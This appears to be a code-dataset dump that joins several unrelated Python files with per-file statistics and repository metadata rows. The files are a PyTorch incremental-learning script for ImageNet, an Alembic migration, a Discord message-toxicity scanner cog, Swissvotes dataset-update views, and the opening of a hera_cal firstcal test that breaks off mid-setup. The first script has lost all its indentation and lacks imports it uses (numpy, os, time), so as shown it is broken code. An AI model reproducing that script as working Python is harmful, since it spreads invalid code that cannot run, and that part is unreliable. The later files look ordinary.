from copy import deepcopy
import random
from sklearn.model_selection import train_test_split
import json
#from multiprocessing import Pool as cpu_pool
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from models.resnet import resnet18
from models.resnet import resnet34
import torch.nn.functional as F
from get_incremental_data import getIncrementalData
from get_transformed_data_with_decay import getTransformedData
from get_previous_data import getPreviousData
#from get_transformed_data import getTransformedData
from my_models.new_shallow import auto_shallow
from training_functions import train_reconstruction
from training_functions import eval_reconstruction
from training_functions import get_embeddings
from training_functions import get_pseudoimages
from training_functions import train
from training_functions import eval_training
from training_functions import train_with_decay
from training_functions import eval_training_with_decay
from get_centroids import getCentroids
from Functions_new import get_pseudoSamples
from label_smoothing import LSR
#seed = random.randint(0,1000)
seed = 7
np.random.seed(seed)
torch.manual_seed(seed)
random.seed(seed)
if __name__ == '__main__':
dataset_name = 'imagenet'
features_name = 'multiple_65000'
save_data = False
use_saved_images = True
path_to_previous = '/home/ali/Ali_Work/clean_autoencoder_based/Imagenet-50/previous_classes'
validation_based = False
if dataset_name == 'imagenet':
path_to_train = '/media/ali/860 Evo/ali/ILSVRC2012_Train'
path_to_test = '/media/ali/860 Evo/ali/ILSVRC2012_Test'
# incremental steps info
total_classes = 10
full_classes = 1000
limiter = 50
# Image transformation mean and std
imagenet_mean = [0.485, 0.456, 0.406]
imagenet_std = [0.229, 0.224, 0.225]
# hyperparameters
weight_decay = 5e-4
classify_lr = 0.1
reconstruction_lr = 0.001
reconstruction_epochs = 100
classification_epochs = 70
batch_size = 64
sample_decay_coeff = 0.05
decay_type = 'exponential'
# for centroids
distance_threshold = 5000
get_covariances = True
diag_covariances = True
clustering_type = 'k_means'
centroids_limit = 10000
centroid_finder = getCentroids(None,None,total_classes,seed=seed,get_covariances=get_covariances,diag_covariances=diag_covariances,centroids_limit=centroids_limit)
# autoencoders_set
auto_1 = auto_shallow(total_classes,seed=seed)
auto_2 = auto_shallow(total_classes,seed=seed)
auto_3 = auto_shallow(total_classes,seed=seed)
auto_4 = auto_shallow(total_classes,seed=seed)
auto_5 = auto_shallow(total_classes,seed=seed)
auto_1 = auto_1.cuda()
auto_2 = auto_2.cuda()
auto_3 = auto_3.cuda()
auto_4 = auto_4.cuda()
auto_5 = auto_5.cuda()
autoencoder_set = [auto_1,auto_2,auto_3,auto_4,auto_5]
#classifier
classify_net = resnet18(total_classes)
#classify_net = resnet18(limiter)
# loss functions and optimizers
#loss_classify = nn.CrossEntropyLoss()
loss_classify = LSR(reduction='none')
loss_rec = nn.MSELoss()
# Variable to generate incremental data
incremental_data_creator = getIncrementalData(path_to_train,path_to_test,full_classes=full_classes,seed=seed)
incremental_data_creator.incremental_data(total_classes=total_classes,limiter=limiter)
# define transforms
transforms_classification_train = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(32),
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(15),
transforms.ToTensor(),
transforms.Normalize(imagenet_mean,imagenet_std)
])
transforms_classification_test = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(32),
transforms.CenterCrop(32),
transforms.ToTensor(),
transforms.Normalize(imagenet_mean,imagenet_std)
])
transforms_reconstruction = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize(32),
transforms.CenterCrop(32),
transforms.ToTensor(),
transforms.Normalize(imagenet_mean,imagenet_std)
])
################################# INCREMENTAL LEARNING PHASE ##################################
complete_x_train = []
complete_y_train = []
complete_x_test = []
complete_y_test = []
complete_centroids = []
complete_covariances = []
complete_centroids_num = []
ages = []
training_accuracies = []
Accus = []
full_classes = limiter
for increment in range(0,int(full_classes/total_classes)):
print ('This is increment number: ',increment)
# get data for the current increment
train_images_increment,train_labels_increment,test_images_increment,test_labels_increment = incremental_data_creator.incremental_data_per_increment(increment)
if increment==0:
previous_images = deepcopy(train_images_increment)
previous_labels = deepcopy(train_labels_increment)
current_increment_ages = [1.0 for x in range(len(train_labels_increment))]
else:
previous_images = []
previous_labels = []
most_recent_images = []
most_recent_labels = []
if use_saved_images:
starter = len(complete_centroids)-total_classes
else:
starter = 0+(increment-1)*total_classes
for i in range(starter,len(complete_centroids)):
temp = complete_centroids[i] # feature vectors for class i
previous_labels.extend([i for x in range(0,len(complete_centroids[i]))]) # labels for class i
if i>=(len(complete_centroids)-total_classes):
most_recent_labels.extend([i for x in range(0,len(complete_centroids[i]))])
# converting to Torch format
temp = np.array(temp)
temp = torch.from_numpy(temp)
temp = temp.float()
# convert feature vectors to images by passing them through the decoder
temp_images,_ = get_pseudoimages(autoencoder_set[increment-1],temp,class_number=i,seed=seed)
temp_images = list(temp_images)
if i>=(len(complete_centroids)-total_classes):
most_recent_images.extend(temp_images)
# update the overall images variable for the previous classes
if use_saved_images == False:
previous_images.extend(temp_images)
if use_saved_images:
# For loading previous class' reconstructed images
previous_data_creator = getPreviousData(path_to_previous,total_classes=total_classes+(increment-1)*total_classes,seed=seed)
previous_images,previous_labels = previous_data_creator.previous_data()
# Finding sample decay
previous_dataset = getTransformedData(most_recent_images,most_recent_labels,transform=transforms_classification_train,seed=seed)
previous_loader = torch.utils.data.DataLoader(previous_dataset,batch_size = batch_size,
shuffle=True, num_workers = 4)
new_accuracy = eval_training_with_decay(classify_net,previous_loader,loss_classify,seed)
new_accuracy = new_accuracy.cpu().numpy().tolist()
sample_decay_coeff = 1 - (new_accuracy/training_accuracies[increment-1])
#new_ages = [np.exp(-sample_decay_coeff*1.0) for x in range(0,len(most_recent_images))]
new_ages = [np.exp(-sample_decay_coeff*0.0) for x in range(0,len(most_recent_images))] # for no decay
ages.extend(new_ages)
current_increment_ages = deepcopy(ages)
current_increment_ages.extend([1.0 for x in range(len(train_labels_increment))])
print ('previous images',np.array(previous_images).shape)
print ('previous labels',np.array(previous_labels).shape)
# append images of the new classes
previous_images.extend(train_images_increment)
previous_labels.extend(train_labels_increment)
print ('total train images',np.array(previous_images).shape)
print ('total train labels',np.array(previous_labels).shape)
# complete x test update with new classes' test images
complete_x_test.extend(test_images_increment)
complete_y_test.extend(test_labels_increment)
if validation_based:
# Creating a validation split
x_train,x_test,y_train,y_test = train_test_split(previous_images,previous_labels,test_size=0.2,stratify=previous_labels)
else:
# otherwise just rename variables
x_train = previous_images
y_train = previous_labels
#x_test = complete_x_test
#y_test = complete_y_test
############################## Classifier Training ######################################
# get dataloaders
train_dataset_classification = getTransformedData(x_train,y_train,transform=transforms_classification_train,seed=seed,ages=current_increment_ages)
test_dataset_classification = getTransformedData(complete_x_test,complete_y_test,transform=transforms_classification_test,seed=seed)
dataloaders_train_classification = torch.utils.data.DataLoader(train_dataset_classification,batch_size = batch_size,
shuffle=True, num_workers = 4)
dataloaders_test_classification = torch.utils.data.DataLoader(test_dataset_classification,batch_size = batch_size,
shuffle=False, num_workers = 4)
if validation_based:
val_dataset_classification = getTransformedData(x_test,y_test,transform=transforms_classification_test,seed=seed)
dataloaders_val_classification = torch.utils.data.DataLoader(val_dataset_classification,batch_size = batch_size,
shuffle=False, num_workers = 4)
# update classifier's fc layer and optimizer
classify_net.fc = nn.Linear(512,total_classes+(total_classes*increment))
optimizer = optim.SGD(classify_net.parameters(),lr=classify_lr,weight_decay=weight_decay,momentum=0.9)
train_scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[60,120,160], gamma=0.2) #learning rate decay
classify_net = classify_net.cuda()
# for faster training times after the first increment
if increment>0:
classification_epochs = 45
train_scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[37], gamma=0.1) #learning rate decay
# load the classifier from file if it has already been trained on the classes of this increment
classifier_path = './checkpoint/'+str(total_classes+(increment*total_classes))+"classes_"+dataset_name
if os.path.exists(classifier_path):
classify_net.load_state_dict(torch.load(classifier_path))
epoch_acc = eval_training_with_decay(classify_net,dataloaders_test_classification,loss_classify,seed=seed)
Accus.append(epoch_acc.cpu().numpy().tolist())
else:
since = time.time()
best_acc = 0.0
for epoch in range(0, classification_epochs):
classification_loss = train_with_decay(classify_net,dataloaders_train_classification,optimizer,loss_classify,seed=seed)
print ('epoch:', epoch, ' classification loss:', classification_loss, ' learning rate:', optimizer.param_groups[0]['lr'])
train_scheduler.step(epoch)
if validation_based:
epoch_acc = eval_training_with_decay(classify_net,dataloaders_val_classification,loss_classify,seed=seed)
if epoch_acc>=best_acc:
best_acc = epoch_acc
best_model_wts = deepcopy(classify_net.state_dict())
print (' ')
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
if validation_based:
#print ('best_acc',best_acc)
classify_net.load_state_dict(best_model_wts)
epoch_acc = eval_training_with_decay(classify_net,dataloaders_test_classification,loss_classify,seed=seed)
print ('test_acc',epoch_acc)
Accus.append(epoch_acc.cpu().numpy().tolist())
if validation_based:
torch.save(best_model_wts, "./checkpoint/"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
else:
torch.save(classify_net.state_dict(),"./checkpoint/"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
# find training accuracy of images of this increment
current_dataset = getTransformedData(train_images_increment,train_labels_increment,transform=transforms_classification_train,seed=seed)
current_loader = torch.utils.data.DataLoader(current_dataset,batch_size = batch_size,
shuffle=True, num_workers = 4)
print('Finding Training Accuracy')
new_accuracy = eval_training_with_decay(classify_net,current_loader,loss_classify,seed)
new_accuracy = new_accuracy.cpu().numpy().tolist()
training_accuracies.append(new_accuracy)
############################## Autoencoder Training ######################################
# get dataloaders
train_dataset_reconstruction = getTransformedData(train_images_increment,train_labels_increment,
transform=transforms_reconstruction,seed=seed)
test_dataset_reconstruction = getTransformedData(test_images_increment,test_labels_increment,transform=transforms_reconstruction,seed=seed)
dataloaders_train_reconstruction = torch.utils.data.DataLoader(train_dataset_reconstruction,batch_size = batch_size,
shuffle=True, num_workers = 4)
dataloaders_test_reconstruction = torch.utils.data.DataLoader(test_dataset_reconstruction,batch_size = batch_size,
shuffle=True, num_workers = 4)
for_embeddings_dataloader = torch.utils.data.DataLoader(train_dataset_reconstruction,batch_size = batch_size,
shuffle=False, num_workers = 4)
# load the autoencoder from file if it has already been trained on the classes of this increment
autoencoder_path = './checkpoint/autoencoder_'+str(total_classes+(increment*total_classes))+"classes_"+dataset_name
if os.path.exists(autoencoder_path):
autoencoder_set[increment].load_state_dict(torch.load(autoencoder_path))
else:
optimizer_rec = optim.Adam(autoencoder_set[increment].parameters(), lr=reconstruction_lr, weight_decay=weight_decay)
train_scheduler_rec = optim.lr_scheduler.MultiStepLR(optimizer_rec, milestones=[50], gamma=0.1) #learning rate decay
since = time.time()
best_loss = 100.0
for epoch in range(1, reconstruction_epochs):
#reconstruction_loss = train_reconstruction(autoencoder_set[increment],dataloaders_train_reconstruction,
#optimizer_rec,loss_rec,lambda_based=True,classify_net=classify_net,seed=seed,epoch=epoch)
reconstruction_loss = train_reconstruction(autoencoder_set[increment],dataloaders_train_reconstruction,optimizer_rec,loss_rec,seed=seed,epoch=epoch)
print ('epoch:', epoch, ' reconstruction loss:', reconstruction_loss)
train_scheduler_rec.step(epoch)
"""
#test_loss = eval_reconstruction(net,dataloaders_test_reconstruction,loss_rec,seed=seed)
test_loss = eval_reconstruction(autoencoder_set[increment],dataloaders_test_reconstruction,loss_rec,seed=seed)
if test_loss<=best_loss:
best_loss = test_loss
#best_model_wts = deepcopy(net.state_dict())
best_model_wts = deepcopy(autoencoder_set[increment].state_dict())
"""
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print (' ')
#autoencoder_set[increment].load_state_dict(best_model_wts)
if validation_based:
torch.save(best_model_wts, "./checkpoint/autoencoder_"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
else:
torch.save(autoencoder_set[increment].state_dict(),
"./checkpoint/autoencoder_"+str(total_classes+(increment*total_classes))+"classes_"+dataset_name)
# get embeddings from the trained autoencoder
embeddings = get_embeddings(autoencoder_set[increment],for_embeddings_dataloader,total_classes,seed=seed,increment=increment)
print ('embeddings',np.array(embeddings).shape)
complete_centroids.extend(embeddings)
print ('complete centroids',np.array(complete_centroids).shape)
print ('All accuracies yet', Accus)
experimental_data = dict()
experimental_data['seed'] = seed
experimental_data['acc'] = Accus
if save_data == True:
with open('data.json','r') as f:
data=json.load(f)
if features_name not in data:
data[features_name] = dict()
data[features_name][str(len(data[features_name])+1)] = experimental_data
with open('data.json', 'w') as fp:
json.dump(data, fp, indent=4, sort_keys=True)
| 48.89863 | 167 | 0.69173 | 2,089 | 17,848 | 5.607946 | 0.147918 | 0.033803 | 0.019633 | 0.018438 | 0.472898 | 0.38216 | 0.316432 | 0.268801 | 0.245668 | 0.195391 | 0 | 0.014851 | 0.215262 | 17,848 | 364 | 168 | 49.032967 | 0.821576 | 0.101468 | 0 | 0.207407 | 0 | 0 | 0.046735 | 0.012615 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.122222 | 0 | 0.122222 | 0.059259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85bd223e0cf28db4979086843c4d74e26ddf230 | 1,038 | py | Python | server/migrations/versions/cef206444493_finished_stockdata_model.py | J-Obog/market-simulator | 90446f42a5f86f13785ea5010687a5e2c1fb2799 | [
"MIT"
] | 4 | 2021-08-09T03:05:08.000Z | 2021-11-08T02:41:13.000Z | server/migrations/versions/cef206444493_finished_stockdata_model.py | J-Obog/market-simulator | 90446f42a5f86f13785ea5010687a5e2c1fb2799 | [
"MIT"
] | null | null | null | server/migrations/versions/cef206444493_finished_stockdata_model.py | J-Obog/market-simulator | 90446f42a5f86f13785ea5010687a5e2c1fb2799 | [
"MIT"
] | null | null | null | """finished StockData model
Revision ID: cef206444493
Revises: b2fc3cd134da
Create Date: 2021-10-06 14:23:02.119153
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'cef206444493'
down_revision = 'b2fc3cd134da'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('stock_data',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('stock_id', sa.Integer(), nullable=False),
sa.Column('prev_close', sa.Float(decimal_return_scale=2), nullable=False),
sa.Column('market_price', sa.Float(decimal_return_scale=2), nullable=False),
sa.Column('timestamp', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['stock_id'], ['stock.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('stock_data')
# ### end Alembic commands ###
| 28.054054 | 80 | 0.692678 | 130 | 1,038 | 5.415385 | 0.484615 | 0.056818 | 0.106534 | 0.119318 | 0.349432 | 0.349432 | 0.349432 | 0.258523 | 0.133523 | 0.133523 | 0 | 0.057143 | 0.157033 | 1,038 | 36 | 81 | 28.833333 | 0.747429 | 0.294798 | 0 | 0 | 0 | 0 | 0.148201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85c0b24e4a6ca5d14ce9d591566527e4acac390 | 5,044 | py | Python | cogs/scanner.py | MattBSG/Toxic-Classification-Bot | 90e1558996452ec782c8dfecd801d8ddf8d69149 | [
"MIT"
] | null | null | null | cogs/scanner.py | MattBSG/Toxic-Classification-Bot | 90e1558996452ec782c8dfecd801d8ddf8d69149 | [
"MIT"
] | null | null | null | cogs/scanner.py | MattBSG/Toxic-Classification-Bot | 90e1558996452ec782c8dfecd801d8ddf8d69149 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import asyncio
from datetime import datetime, timedelta
import discord
from discord.ext import commands
from utils.checks import in_scan_channel
class Rollback(Exception):
pass
class Scanner(commands.Cog):
def __init__(self, bot):
super().__init__()
self.bot = bot
self.messages = []
self.manual_check = False
self.message_lock = asyncio.Lock()
self.compute_lock = asyncio.Lock()
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
# Ignore prefix
if message.content.startswith("f."): return
if (message.author.id == self.bot.user.id): return
# Ignore message not in scan channels
if not in_scan_channel(self, message.channel.id): return
async with self.message_lock:
# Add messages to processing queue
self.messages += [message]
if len(self.messages) % 100 == 0 or len(self.messages) == 1:
self.bot.logger.info(f"Added message {len(self.messages)}/{self.bot.config.get('min_scanned')}")
await self.process_messages()
@commands.is_owner()
@commands.command("extract_messages")
async def extract_messages_command(self, ctx: commands.Context, channel_id: str='', count: int=500):
channel = self.bot.get_channel(int(channel_id))
reply = await ctx.send(f'1. Fetching {count} messages...')
start = datetime.now()
messages = await channel.history(limit=count).flatten()
await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n2. Waiting in model queue...")
start = datetime.now()
self.manual_check = True
async with self.message_lock:
# Add messages to processing queue
self.messages += messages
self.bot.logger.info(f"Added messages {len(self.messages)}/{self.bot.config.get('min_scanned')}")
await self.process_messages(reply, start)
async def process_messages(self, reply: discord.Message=None, start: datetime=None):
async with self.compute_lock:
# Load model cog
nlp_cog = self.bot.get_cog('NLP')
if nlp_cog is None:
self.bot.logger.info("The cog \"NLP\" is not loaded")
return
# If enough messages were collected then start processing
async with self.message_lock:
if len(self.messages) < self.bot.config.get('min_scanned') or (self.manual_check and reply is None):
if reply is not None: await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n3. Not enough messages to scan {len(self.messages)}/{self.bot.config.get('min_scanned')}")
return
test_messages =self.messages.copy()
self.messages = []
if reply is not None: await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n3. Running model on {len(test_messages)} messages...")
start = datetime.now()
# Run model
flags,new_reviews,logs = await asyncio.get_event_loop().run_in_executor(None, nlp_cog.compute_messages, test_messages)
if reply is not None:
content = f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)"
for l in logs:
content += f"\n\t{l}"
content += f"\n>Flagged {len(flags)} messages and selected {len(new_reviews)} messages for the review queue."
content += f"\n4. Sending flagged messages to <#{self.bot.config.get('flag_channel')}>..."
await reply.edit(content=content)
start = datetime.now()
if len(flags) > 0:
# Send flagged messages
for flag in flags:
await self.bot.get_channel(self.bot.config.get('flag_channel')).send(embed=flag)
if reply is not None: await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)\n5. Sending review messages to <#{self.bot.config.get('review_channel')}> or review queue...")
start = datetime.now()
# Load review queue cog
review_queue_cog = self.bot.get_cog('ReviewQueue')
if review_queue_cog is None:
self.bot.logger.info("The cog \"ReviewQueue\" is not loaded")
return
# Add flagged messages to review queue
await review_queue_cog.add_reviews_to_queue(new_reviews)
if reply is not None:
await reply.edit(content=f"{reply.content} Done ({(datetime.now()-start).total_seconds()} seconds)")
self.manual_check = False
def setup(bot):
bot.add_cog(Scanner(bot))
| 47.140187 | 232 | 0.601705 | 622 | 5,044 | 4.762058 | 0.209003 | 0.042539 | 0.030722 | 0.037812 | 0.378123 | 0.359217 | 0.302498 | 0.302498 | 0.302498 | 0.253207 | 0 | 0.004413 | 0.281126 | 5,044 | 106 | 233 | 47.584906 | 0.812466 | 0.059278 | 0 | 0.220779 | 0 | 0.064935 | 0.242181 | 0.106086 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0.012987 | 0.064935 | 0 | 0.155844 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85d442ed83636a731ffbcfcd4c75ba8be7db01f | 6,710 | py | Python | src/onegov/swissvotes/views/votes.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/swissvotes/views/votes.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/swissvotes/views/votes.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | from morepath.request import Response
from onegov.core.security import Private
from onegov.core.security import Public
from onegov.core.security import Secret
from onegov.form import Form
from onegov.swissvotes import _
from onegov.swissvotes import SwissvotesApp
from onegov.swissvotes.collections import SwissVoteCollection
from onegov.swissvotes.external_resources import MfgPosters
from onegov.swissvotes.external_resources import SaPosters
from onegov.swissvotes.forms import SearchForm
from onegov.swissvotes.forms import UpdateDatasetForm
from onegov.swissvotes.forms import UpdateExternalResourcesForm
from onegov.swissvotes.forms import UpdateMetadataForm
from onegov.swissvotes.layouts import DeleteVotesLayout
from onegov.swissvotes.layouts import UpdateExternalResourcesLayout
from onegov.swissvotes.layouts import UpdateMetadataLayout
from onegov.swissvotes.layouts import UpdateVotesLayout
from onegov.swissvotes.layouts import VotesLayout
from translationstring import TranslationString
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Public,
form=SearchForm,
template='votes.pt'
)
def view_votes(self, request, form):
if not form.errors:
form.apply_model(self)
return {
'layout': VotesLayout(self, request),
'form': form
}
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Private,
form=UpdateDatasetForm,
template='form.pt',
name='update'
)
def update_votes(self, request, form):
self = self.default()
layout = UpdateVotesLayout(self, request)
if form.submitted(request):
added, updated = self.update(form.dataset.data)
request.message(
_(
"Dataset updated (${added} added, ${updated} updated)",
mapping={'added': added, 'updated': updated}
),
'success'
)
# Warn if descriptor labels are missing
missing = set()
for vote in self.query():
for policy_area in vote.policy_areas:
missing |= set(
path for path in policy_area.label_path
if not isinstance(path, TranslationString)
)
if missing:
request.message(
_(
"The dataset contains unknown descriptors: ${items}.",
mapping={'items': ', '.join(sorted(missing))}
),
'warning'
)
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'cancel': request.link(self),
'button_text': _("Update"),
}
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Private,
form=UpdateMetadataForm,
template='form.pt',
name='update-metadata'
)
def update_metadata(self, request, form):
self = self.default()
layout = UpdateMetadataLayout(self, request)
if form.submitted(request):
added, updated = self.update_metadata(form.metadata.data)
request.message(
_(
"Metadata updated (${added} added, ${updated} updated)",
mapping={'added': added, 'updated': updated}
),
'success'
)
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'cancel': request.link(self),
'button_text': _("Update"),
}
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Private,
form=UpdateExternalResourcesForm,
template='form.pt',
name='update-external-resources'
)
def update_external_resources(self, request, form):
self = self.default()
layout = UpdateExternalResourcesLayout(self, request)
if form.submitted(request):
added_total = 0
updated_total = 0
removed_total = 0
failed_total = set()
for resource, cls in (
('mfg', MfgPosters(request.app.mfg_api_token)),
('sa', SaPosters())
):
if resource in form.resources.data:
added, updated, removed, failed = cls.fetch(request.session)
added_total += added
updated_total += updated
removed_total += removed
failed_total |= failed
request.message(
_(
'External resources updated (${added} added, '
'${updated} updated, ${removed} removed)',
mapping={
'added': added_total,
'updated': updated_total,
'removed': removed_total
}
),
'success'
)
if failed_total:
failed_total = ', '.join((
layout.format_bfs_number(item) for item in sorted(failed_total)
))
request.message(
_(
'Some external resources could not be updated: ${failed}',
mapping={'failed': failed_total}
),
'warning'
)
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'cancel': request.link(self),
'button_text': _("Update external resources"),
}
@SwissvotesApp.view(
model=SwissVoteCollection,
permission=Public,
name='csv'
)
def export_votes_csv(self, request):
return Response(
request.app.get_cached_dataset('csv'),
content_type='text/csv',
content_disposition='inline; filename=dataset.csv'
)
@SwissvotesApp.view(
model=SwissVoteCollection,
permission=Public,
name='xlsx'
)
def export_votes_xlsx(self, request):
return Response(
request.app.get_cached_dataset('xlsx'),
content_type=(
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
),
content_disposition='inline; filename=dataset.xlsx'
)
@SwissvotesApp.form(
model=SwissVoteCollection,
permission=Secret,
form=Form,
template='form.pt',
name='delete'
)
def delete_votes(self, request, form):
self = self.default()
layout = DeleteVotesLayout(self, request)
if form.submitted(request):
for vote in self.query():
request.session.delete(vote)
request.message(_("All votes deleted"), 'success')
return request.redirect(layout.votes_url)
return {
'layout': layout,
'form': form,
'message': _("Do you really want to delete all votes?!"),
'button_text': _("Delete"),
'button_class': 'alert',
'cancel': request.link(self)
}
| 28.432203 | 79 | 0.609836 | 639 | 6,710 | 6.300469 | 0.209703 | 0.044709 | 0.069548 | 0.033532 | 0.505961 | 0.334078 | 0.304521 | 0.231495 | 0.211128 | 0.185792 | 0 | 0.000628 | 0.288376 | 6,710 | 235 | 80 | 28.553191 | 0.842513 | 0.005514 | 0 | 0.40099 | 0 | 0 | 0.130865 | 0.016639 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034653 | false | 0 | 0.09901 | 0.009901 | 0.188119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85d4cf44430862f9bfd99764870fc365b640c93 | 13,810 | py | Python | hera_cal/tests/test_firstcal.py | keelder/hera_cal | 6f2f78ad4a5c8a3f47065c178e15f0569f80157e | [
"MIT"
] | null | null | null | hera_cal/tests/test_firstcal.py | keelder/hera_cal | 6f2f78ad4a5c8a3f47065c178e15f0569f80157e | [
"MIT"
] | null | null | null | hera_cal/tests/test_firstcal.py | keelder/hera_cal | 6f2f78ad4a5c8a3f47065c178e15f0569f80157e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018 the HERA Project
# Licensed under the MIT License
'''Tests for firstcal.py'''
import nose.tools as nt
import os
import json
import numpy as np
import aipy
import optparse
import sys
from pyuvdata import UVCal, UVData
import hera_cal.firstcal as firstcal
from hera_cal.omni import compute_reds
from hera_cal.data import DATA_PATH
from hera_cal.calibrations import CAL_PATH
class Test_FirstCal(object):
def setUp(self):
antpos = np.array([[14.60000038, -25.28794098, 1.],
[21.89999962, -12.64397049, 1.],
[14.60000038, 25.28794098, 1.],
[-21.89999962, -12.64397049, 1.],
[-14.60000038, 0., 1.],
[21.89999962, 12.64397049, 1.],
[29.20000076, 0., 1.],
[-14.60000038, -25.28794098, 1.],
[0., 25.28794098, 1.],
[0., -25.28794098, 1.],
[0., 0., 1.],
[-7.30000019, -12.64397049, 1.],
[-7.30000019, 12.64397049, 1.],
[-21.89999962, 12.64397049, 1.],
[-29.20000076, 0., 1.],
[14.60000038, 0., 1.],
[-14.60000038, 25.28794098, 1.],
[7.30000019, -12.64397049, 1.]])
reds = [[(0, 8), (9, 16)],
[(13, 15), (14, 17), (3, 0), (4, 1), (16, 5), (12, 6)],
[(3, 17), (4, 15), (7, 0), (11, 1),
(16, 2), (12, 5), (10, 6), (14, 10)],
[(3, 6), (14, 5)],
[(0, 9), (1, 17), (2, 8), (4, 14), (6, 15), (8, 16), (12, 13), (11, 3),
(10, 4), (9, 7), (15, 10), (17, 11)],
[(3, 8), (11, 2), (9, 5)],
[(3, 9), (4, 17), (12, 15), (11, 0),
(10, 1), (8, 5), (13, 10), (14, 11)],
[(0, 13), (1, 16)],
[(0, 4), (1, 12), (6, 8), (9, 14), (15, 16), (17, 13)],
[(0, 5), (3, 16), (7, 12), (17, 2), (11, 8)],
[(0, 10), (7, 14), (10, 16), (11, 13),
(6, 2), (9, 4), (15, 8), (17, 12)],
[(1, 9), (2, 12), (5, 10), (6, 17), (8, 13),
(12, 14), (10, 3), (17, 7), (15, 11)],
[(2, 3), (5, 7)],
[(16, 17), (12, 0), (8, 1), (13, 9)],
[(0, 17), (1, 15), (3, 14), (4, 13), (9, 11), (10, 12), (12, 16), (5, 2), (7, 3),
(11, 4), (6, 5), (17, 10)],
[(3, 15), (4, 5), (7, 1), (13, 2), (11, 6)],
[(5, 15), (8, 12), (10, 11), (13, 14), (15, 17), (1, 0), (6, 1), (4, 3), (12, 4),
(11, 7), (17, 9), (16, 13)],
[(0, 15), (1, 5), (3, 13), (4, 16), (9, 10),
(11, 12), (15, 2), (7, 4), (10, 8)],
[(0, 6), (3, 12), (4, 8), (7, 10),
(9, 15), (14, 16), (10, 2), (17, 5)],
[(8, 17), (2, 1), (13, 7), (12, 9), (16, 11)],
[(0, 2), (7, 16), (9, 8)], [(4, 6), (14, 15), (3, 1), (13, 5)],
[(0, 14), (1, 13), (6, 16)],
[(2, 14), (6, 7), (5, 3)],
[(2, 9), (8, 7)],
[(2, 4), (5, 11), (6, 9), (8, 14), (15, 7)], [(1, 14), (6, 13)]]
self.freqs = np.linspace(.1, .2, 64)
self.times = np.arange(1)
ants = np.arange(len(antpos))
reds = compute_reds(len(ants), 'x', antpos, tol=0.1)
